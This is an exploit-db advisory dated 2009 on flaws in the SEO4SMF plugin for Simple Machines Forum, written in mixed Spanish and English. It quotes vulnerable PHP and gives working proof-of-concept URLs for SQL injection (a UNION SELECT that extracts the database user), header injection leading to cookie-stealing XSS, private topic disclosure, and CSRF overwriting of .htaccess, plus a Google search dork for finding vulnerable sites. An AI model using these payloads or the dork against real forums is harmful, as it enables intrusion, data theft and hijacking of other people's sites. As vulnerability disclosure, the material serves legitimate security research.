exploit-db-mirror/platforms/php/webapps/7723.txt

[1] Inyection SQL

Linea 50 al 63
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = *$topic*
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 105 al 108
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = *$board*
LIMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 125
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 143
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".*$tpage*." limit 1", __FILE__, __LINE__);

Where:

Linea 7 al 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];


Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=

[2] Inyection of headers, Cross site Scripting and Path disclosure:
Source:

if(!empty <http://www.php.net/empty>($url)){
header <http://www.php.net/header>('HTTP/1.1 301 Moved Permanently');
header <http://www.php.net/header>('Location: '.$url);
exit <http://www.php.net/exit>;
}


The proof of concept:
http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png
Or print the error with path disclosure.

[3] Disclosure in topics:
http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen
This return the privates forumnames and topicnames.

[4] Cross site request forgery and inyection of arbitrary code
Source:
if (isset($_POST['htaccess']))
{
$htaccess = stripslashes($_POST['htaccess']);

//str_replace("\\\\","\\",$htaccess);
file_put_contents($boarddir."/.htaccess", $htaccess);
}
csrf -> .htaccess rewrited -> pwned!
and xml files.

exploits and more in
http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html
and
http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html

-={[unica_inc algún dia estaremos juntos]}=-

# milw0rm.com [2009-01-11]